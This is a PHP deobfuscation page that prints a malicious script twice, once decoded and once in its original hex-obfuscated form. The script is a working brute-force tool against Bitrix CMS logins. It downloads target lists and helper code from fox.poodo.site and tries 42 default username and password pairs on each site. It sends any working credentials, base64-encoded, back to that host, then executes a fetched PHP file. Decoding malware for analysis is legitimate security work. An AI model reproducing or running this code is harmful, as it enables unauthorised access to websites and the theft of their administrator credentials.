Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto lUVqA; gGHAM: file_put_contents("\x72\157\x6c\x6c\56\164\170\x74", http_get_c..

Decoded Output download

<?php 
 goto lUVqA; gGHAM: file_put_contents("roll.txt", http_get_contents("http://fox.poodo.site/st/rollheader.txt")); goto dSbwY; mGVkP: date_default_timezone_set("Europe/Kiev"); goto gMBM1; dSbwY: file_put_contents("angry.txt", http_get_contents("http://fox.poodo.site/st/angry.txt")); goto pbXF1; MlFhs: unlink("get_cms1.txt"); goto I3HSZ; pbXF1: require_once "roll.txt"; goto drJos; s00u5: file_put_contents(basename(__FILE__), http_get_contents("http://fox.poodo.site/st/get_cms1.txt")); goto Pdg0M; z2BYo: $f = fopen("get_cms1.txt", "r"); goto TQmJ8; TLUwN: $AC = new AngryCurl("callback_function"); goto FaDTB; drJos: require_once "angry.txt"; goto ZzVGT; apodH: $AC->execute(30); goto MlFhs; gMBM1: function http_get_contents($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $urlPage = curl_exec($ch); curl_close($ch); return $urlPage; } goto s00u5; Pdg0M: file_put_contents("list.txt", http_get_contents("http://fox.poodo.site/st/list.txt")); goto gGHAM; FaDTB: $AC->load_useragent_list("list.txt"); goto z2BYo; ZzVGT: file_put_contents("get_cms1.txt", http_get_contents("http://fox.poodo.site/get_cms1.php")); goto N4qrS; TQmJ8: while (!feof($f)) { $url = trim(fgets($f)); $parse = parse_url($url); $users = array(1 => array("login" => "123456", "password" => "123456"), 2 => array("login" => "admin", "password" => "123456"), 3 => array("login" => "admin", "password" => "Bitrix*123456"), 4 => array("login" => "admin", "password" => "adminadmin"), 5 => array("login" => "test", "password" => "123456"), 6 => array("login" => "admin", "password" => "admin123"), 7 => array("login" => "test", "password" => "testtest"), 8 => array("login" => "test", "password" => "test123"), 9 => array("login" => "admin", "password" => "123123"), 10 => array("login" => "content", "password" => "content"), 11 => array("login" => "bitrix", "password" => "bitrix"), 12 => array("login" => "admin", "password" => "111111"), 13 => array("login" => "qwerty", "password" => "qwerty"), 14 => array("login" => "manager", "password" => "manager"), 15 => array("login" => "admin", "password" => "1234567890"), 16 => array("login" => "support", "password" => "support"), 17 => array("login" => "admin", "password" => "123456789"), 18 => array("login" => "admin", "password" => "12345678"), 19 => array("login" => "bitrix", "password" => "123456"), 20 => array("login" => "admin", "password" => "qwerty"), 21 => array("login" => "admin", "password" => "qwerty123"), 22 => array("login" => "123", "password" => "123123"), 23 => array("login" => "manager", "password" => "123456"), 24 => array("login" => "content", "password" => "123456"), 25 => array("login" => "tester", "password" => "tester"), 26 => array("login" => "admin2", "password" => "admin2"), 27 => array("login" => "admin2", "password" => "123456"), 28 => array("login" => "admin1", "password" => "123456"), 29 => array("login" => "manager", "password" => "manager123"), 30 => array("login" => "admin", "password" => "1q2w3e4r"), 31 => array("login" => "admin", "password" => "password"), 32 => array("login" => "bitrix", "password" => "bitrix123"), 33 => array("login" => "content", "password" => "content123"), 34 => array("login" => "administrator", "password" => "administrator"), 35 => array("login" => "bitrix", "password" => "bitrixbitrix"), 36 => array("login" => "admin", "password" => "1234567"), 37 => array("login" => "support", "password" => "123456"), 38 => array("login" => "test", "password" => "159753"), 39 => array("login" => "Admin", "password" => "123456"), 40 => array("login" => "admin1", "password" => "admin1"), 41 => array("login" => "admin", "password" => "bitrix"), 42 => array("login" => "admin", "password" => "admin1")); $i = 1; while ($i < 42) { $post_par = "backurl=%2F&AUTH_FORM=Y&TYPE=AUTH&USER_LOGIN=" . $users[$i]["login"] . "&USER_PASSWORD=" . $users[$i]["password"] . "&Login=%D0%92%D0%BE%D0%B9%D1%82%D0%B8"; $AC->post($url, $post_par); $i++; } } goto apodH; N4qrS: function callback_function($response, $info, $request) { if (strpos($response, ".AUTHAGENT.setAuthResult") !== false) { parse_str($request->post_data, $output); $login = $output["USER_LOGIN"]; $password = $output["USER_PASSWORD"]; echo PHP_EOL . " ===================== ok: =====================  " . $info["url"] . " - " . $login . ":" . $password . '' . PHP_EOL; http_get_contents("http://fox.poodo.site/cms1.php?we=" . base64_encode($info["url"]) . "&fe=" . base64_encode("inc.class.cms.1.php") . "&cm=" . base64_encode("1") . "&sl=" . base64_encode($login) . "&sp=" . base64_encode($password)); goto end; } end: return; } goto TLUwN; I3HSZ: system("php inc.class.cms.1.php"); goto J0wA5; lUVqA: ini_set("max_execution_time", 0); goto o2JV5; o2JV5: ini_set("memory_limit", "512M"); goto mGVkP; J0wA5: ?> 

Did this file decode correctly?

Original Code

<?php
 goto lUVqA; gGHAM: file_put_contents("\x72\157\x6c\x6c\56\164\170\x74", http_get_contents("\x68\164\164\160\72\57\57\x66\x6f\x78\x2e\x70\x6f\x6f\144\x6f\56\163\151\164\x65\x2f\163\164\57\x72\157\154\154\150\145\141\x64\x65\162\x2e\164\x78\164")); goto dSbwY; mGVkP: date_default_timezone_set("\105\165\162\x6f\x70\x65\57\x4b\151\x65\166"); goto gMBM1; dSbwY: file_put_contents("\x61\x6e\147\x72\171\x2e\x74\x78\164", http_get_contents("\150\164\x74\160\x3a\57\x2f\x66\157\170\x2e\160\x6f\157\x64\x6f\56\163\151\164\x65\x2f\163\x74\x2f\x61\x6e\x67\x72\x79\x2e\164\x78\x74")); goto pbXF1; MlFhs: unlink("\x67\145\164\x5f\x63\155\x73\x31\56\164\x78\x74"); goto I3HSZ; pbXF1: require_once "\x72\x6f\154\154\x2e\x74\x78\164"; goto drJos; s00u5: file_put_contents(basename(__FILE__), http_get_contents("\150\164\x74\160\72\57\x2f\x66\157\170\56\160\x6f\x6f\144\x6f\x2e\163\x69\164\145\x2f\x73\x74\57\147\x65\164\x5f\x63\x6d\x73\61\56\x74\x78\x74")); goto Pdg0M; z2BYo: $f = fopen("\147\145\164\x5f\x63\155\x73\x31\x2e\164\x78\x74", "\x72"); goto TQmJ8; TLUwN: $AC = new AngryCurl("\143\141\x6c\x6c\142\x61\143\153\x5f\x66\x75\x6e\143\x74\x69\x6f\156"); goto FaDTB; drJos: require_once "\x61\x6e\x67\x72\171\x2e\x74\x78\x74"; goto ZzVGT; apodH: $AC->execute(30); goto MlFhs; gMBM1: function http_get_contents($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $urlPage = curl_exec($ch); curl_close($ch); return $urlPage; } goto s00u5; Pdg0M: file_put_contents("\x6c\x69\163\164\56\x74\x78\x74", http_get_contents("\x68\x74\164\x70\72\57\57\x66\x6f\170\56\160\x6f\x6f\144\x6f\x2e\163\151\164\x65\57\x73\164\x2f\x6c\x69\163\164\56\x74\x78\164")); goto gGHAM; FaDTB: $AC->load_useragent_list("\154\x69\x73\164\x2e\164\170\x74"); goto z2BYo; ZzVGT: file_put_contents("\x67\x65\164\x5f\x63\155\163\x31\x2e\x74\x78\x74", http_get_contents("\x68\x74\164\x70\x3a\x2f\57\x66\x6f\170\56\160\x6f\x6f\x64\157\x2e\163\151\x74\x65\57\x67\x65\164\x5f\x63\x6d\x73\x31\x2e\160\x68\x70")); goto N4qrS; TQmJ8: while (!feof($f)) { $url = trim(fgets($f)); $parse = parse_url($url); $users = array(1 => array("\x6c\x6f\147\x69\156" => "\x31\62\x33\64\x35\66", "\160\141\163\163\x77\157\162\x64" => "\x31\x32\63\64\x35\66"), 2 => array("\154\157\x67\151\156" => "\141\144\155\x69\x6e", "\x70\141\163\163\167\157\162\x64" => "\x31\x32\63\x34\x35\66"), 3 => array("\x6c\157\x67\151\156" => "\141\144\x6d\151\156", "\x70\141\x73\163\x77\x6f\x72\144" => "\x42\x69\x74\162\151\170\x2a\61\x32\63\x34\65\66"), 4 => array("\154\x6f\147\x69\156" => "\x61\144\155\151\156", "\160\x61\x73\x73\167\157\x72\x64" => "\141\144\x6d\151\156\x61\144\x6d\151\156"), 5 => array("\x6c\x6f\x67\x69\156" => "\x74\145\163\164", "\160\x61\163\163\167\157\162\x64" => "\x31\x32\63\64\65\66"), 6 => array("\x6c\157\147\x69\156" => "\141\x64\155\x69\x6e", "\x70\141\x73\163\167\x6f\162\x64" => "\x61\x64\155\151\x6e\x31\x32\x33"), 7 => array("\x6c\157\x67\151\156" => "\x74\145\x73\164", "\x70\141\163\x73\x77\x6f\162\x64" => "\x74\145\163\x74\x74\x65\163\164"), 8 => array("\x6c\157\147\151\x6e" => "\x74\145\x73\164", "\160\x61\163\163\x77\157\x72\144" => "\164\145\163\164\x31\x32\x33"), 9 => array("\154\x6f\x67\x69\x6e" => "\141\144\155\x69\x6e", "\x70\141\163\163\167\157\x72\144" => "\x31\x32\x33\61\x32\x33"), 10 => array("\154\157\x67\x69\x6e" => "\143\x6f\156\164\x65\x6e\x74", "\x70\x61\x73\163\x77\x6f\x72\144" => "\143\x6f\156\x74\x65\156\164"), 11 => array("\x6c\157\147\151\x6e" => "\x62\x69\164\162\151\x78", "\x70\141\163\163\167\x6f\162\144" => "\x62\151\164\x72\151\170"), 12 => array("\154\157\x67\x69\156" => "\141\144\x6d\x69\156", "\160\141\x73\x73\x77\157\162\144" => "\x31\61\x31\61\x31\61"), 13 => array("\154\157\x67\x69\156" => "\161\167\145\x72\x74\x79", "\x70\x61\x73\163\167\157\x72\144" => "\161\167\x65\162\x74\171"), 14 => array("\154\157\x67\x69\x6e" => "\x6d\141\x6e\141\147\x65\162", "\160\141\x73\163\x77\x6f\162\144" => "\x6d\x61\x6e\x61\x67\x65\x72"), 15 => array("\154\157\x67\151\156" => "\x61\144\x6d\x69\x6e", "\x70\141\x73\163\167\157\162\144" => "\x31\62\63\x34\x35\x36\x37\70\71\x30"), 16 => array("\154\x6f\147\x69\156" => "\163\165\160\160\x6f\x72\164", "\160\x61\163\x73\167\157\162\144" => "\x73\165\160\160\x6f\x72\164"), 17 => array("\x6c\x6f\147\x69\x6e" => "\141\144\x6d\x69\x6e", "\160\141\163\163\x77\157\x72\144" => "\61\62\63\x34\x35\x36\x37\70\71"), 18 => array("\x6c\x6f\x67\151\x6e" => "\141\144\155\151\156", "\x70\x61\x73\163\x77\157\x72\144" => "\x31\x32\x33\x34\x35\x36\x37\70"), 19 => array("\154\157\147\151\x6e" => "\142\151\x74\x72\151\170", "\x70\x61\x73\x73\x77\x6f\x72\x64" => "\61\x32\x33\x34\65\x36"), 20 => array("\154\157\x67\x69\x6e" => "\x61\144\x6d\151\156", "\160\141\x73\163\x77\x6f\x72\x64" => "\x71\167\145\162\164\x79"), 21 => array("\154\157\x67\x69\156" => "\x61\144\155\x69\156", "\x70\141\163\163\x77\157\x72\x64" => "\161\x77\x65\162\164\171\61\62\63"), 22 => array("\154\x6f\147\x69\156" => "\61\62\x33", "\160\x61\163\163\167\x6f\x72\x64" => "\x31\62\x33\x31\62\63"), 23 => array("\154\x6f\147\151\x6e" => "\155\x61\x6e\141\x67\145\x72", "\x70\x61\x73\163\x77\x6f\162\x64" => "\61\62\x33\64\x35\x36"), 24 => array("\154\157\147\x69\156" => "\x63\157\x6e\164\145\x6e\164", "\x70\x61\x73\163\167\157\162\144" => "\x31\62\63\64\x35\x36"), 25 => array("\154\x6f\x67\151\156" => "\164\x65\163\x74\145\x72", "\x70\x61\163\x73\167\x6f\162\144" => "\x74\145\163\164\145\162"), 26 => array("\154\157\x67\151\x6e" => "\x61\x64\x6d\151\156\x32", "\160\x61\x73\163\167\157\162\x64" => "\141\144\155\x69\156\62"), 27 => array("\x6c\157\x67\151\x6e" => "\141\x64\x6d\151\156\62", "\160\141\163\163\x77\157\x72\x64" => "\61\x32\63\x34\65\x36"), 28 => array("\154\x6f\x67\151\x6e" => "\141\x64\155\x69\x6e\61", "\160\x61\x73\163\x77\157\162\144" => "\x31\62\63\64\65\66"), 29 => array("\x6c\x6f\x67\x69\156" => "\x6d\141\x6e\x61\x67\x65\x72", "\x70\141\x73\163\x77\157\162\x64" => "\155\x61\x6e\141\x67\145\162\x31\x32\63"), 30 => array("\154\x6f\x67\151\x6e" => "\x61\x64\x6d\x69\x6e", "\x70\x61\163\163\x77\x6f\162\x64" => "\x31\x71\62\167\63\x65\64\x72"), 31 => array("\x6c\157\x67\151\156" => "\141\x64\155\x69\156", "\x70\x61\163\x73\x77\x6f\162\x64" => "\160\x61\163\163\x77\157\162\x64"), 32 => array("\154\x6f\x67\x69\x6e" => "\142\151\164\162\151\170", "\x70\x61\163\163\167\157\162\144" => "\x62\x69\164\162\151\x78\x31\x32\x33"), 33 => array("\154\157\x67\151\156" => "\143\x6f\156\164\x65\x6e\x74", "\x70\141\x73\163\x77\x6f\x72\144" => "\143\x6f\156\x74\x65\156\164\x31\x32\x33"), 34 => array("\154\x6f\x67\x69\156" => "\141\x64\155\x69\x6e\x69\x73\164\162\x61\x74\x6f\x72", "\160\x61\x73\163\167\157\162\x64" => "\x61\144\x6d\x69\x6e\151\x73\x74\x72\x61\164\157\162"), 35 => array("\154\x6f\147\x69\156" => "\142\151\164\162\151\x78", "\x70\141\x73\x73\167\x6f\x72\x64" => "\x62\151\x74\x72\x69\x78\x62\151\164\x72\151\x78"), 36 => array("\154\x6f\147\151\x6e" => "\141\144\155\x69\x6e", "\160\141\x73\x73\167\157\162\144" => "\x31\x32\x33\64\65\66\x37"), 37 => array("\154\157\147\x69\156" => "\x73\x75\160\x70\157\162\164", "\160\141\x73\x73\x77\157\162\144" => "\x31\62\x33\64\65\66"), 38 => array("\x6c\157\147\x69\x6e" => "\x74\145\163\164", "\160\x61\x73\x73\x77\157\162\x64" => "\x31\65\71\x37\65\63"), 39 => array("\x6c\x6f\147\x69\156" => "\x41\144\155\x69\156", "\160\x61\x73\x73\x77\x6f\x72\144" => "\x31\x32\63\64\x35\66"), 40 => array("\x6c\x6f\147\x69\156" => "\x61\144\x6d\151\x6e\x31", "\160\x61\x73\x73\167\x6f\162\x64" => "\x61\x64\x6d\151\156\61"), 41 => array("\x6c\157\x67\151\156" => "\x61\x64\155\151\x6e", "\160\x61\x73\x73\x77\x6f\x72\x64" => "\142\x69\x74\x72\x69\170"), 42 => array("\154\x6f\147\151\156" => "\141\x64\x6d\151\156", "\160\141\163\x73\x77\x6f\x72\144" => "\x61\x64\155\151\156\x31")); $i = 1; while ($i < 42) { $post_par = "\142\141\x63\153\x75\162\154\x3d\x25\x32\106\x26\x41\x55\x54\x48\137\106\x4f\x52\115\75\131\46\x54\131\120\105\x3d\x41\125\x54\110\x26\125\x53\105\x52\137\x4c\117\107\111\x4e\x3d" . $users[$i]["\x6c\x6f\x67\x69\x6e"] . "\x26\x55\123\105\122\137\x50\101\123\x53\x57\117\x52\104\75" . $users[$i]["\160\x61\x73\x73\x77\x6f\162\x64"] . "\x26\114\x6f\x67\x69\x6e\x3d\45\x44\x30\45\x39\x32\x25\104\60\x25\x42\x45\45\x44\60\x25\102\71\45\104\x31\x25\70\62\45\104\60\x25\102\70"; $AC->post($url, $post_par); $i++; } } goto apodH; N4qrS: function callback_function($response, $info, $request) { if (strpos($response, "\x2e\101\x55\x54\110\x41\107\105\116\124\x2e\163\145\x74\x41\165\164\150\122\x65\x73\x75\x6c\x74") !== false) { parse_str($request->post_data, $output); $login = $output["\x55\123\105\122\x5f\114\117\107\111\116"]; $password = $output["\x55\123\x45\x52\x5f\120\x41\x53\x53\127\117\x52\x44"]; echo PHP_EOL . "\x20\75\75\75\75\75\x3d\x3d\x3d\75\x3d\75\x3d\75\x3d\75\x3d\75\x3d\x3d\75\75\x20\x6f\x6b\x3a\x20\75\75\75\x3d\x3d\x3d\x3d\x3d\75\75\x3d\x3d\x3d\75\x3d\75\75\x3d\x3d\x3d\75\x20\40" . $info["\x75\162\154"] . "\x20\x2d\x20" . $login . "\72" . $password . '' . PHP_EOL; http_get_contents("\x68\164\x74\x70\x3a\57\57\x66\157\x78\56\160\157\x6f\144\x6f\56\x73\x69\164\x65\57\x63\x6d\x73\61\56\160\150\160\77\x77\145\75" . base64_encode($info["\165\162\x6c"]) . "\x26\146\x65\x3d" . base64_encode("\x69\x6e\143\x2e\143\154\141\x73\x73\56\143\x6d\163\x2e\x31\x2e\x70\150\x70") . "\46\143\155\75" . base64_encode("\61") . "\x26\x73\x6c\x3d" . base64_encode($login) . "\46\163\x70\75" . base64_encode($password)); goto end; } end: return; } goto TLUwN; I3HSZ: system("\x70\150\160\40\151\156\143\56\143\154\x61\163\x73\56\x63\x6d\x73\56\x31\x2e\x70\x68\x70"); goto J0wA5; lUVqA: ini_set("\x6d\x61\x78\x5f\x65\x78\x65\143\165\x74\x69\157\156\137\164\151\155\x65", 0); goto o2JV5; o2JV5: ini_set("\155\145\x6d\157\x72\x79\x5f\154\x69\x6d\151\x74", "\65\x31\x32\115"); goto mGVkP; J0wA5: ?>

Function Calls

None

Variables

None

Stats

MD5 64134ad06144c78fccc47f26a3a5a3d3
Eval Count 0
Decode Time 56 ms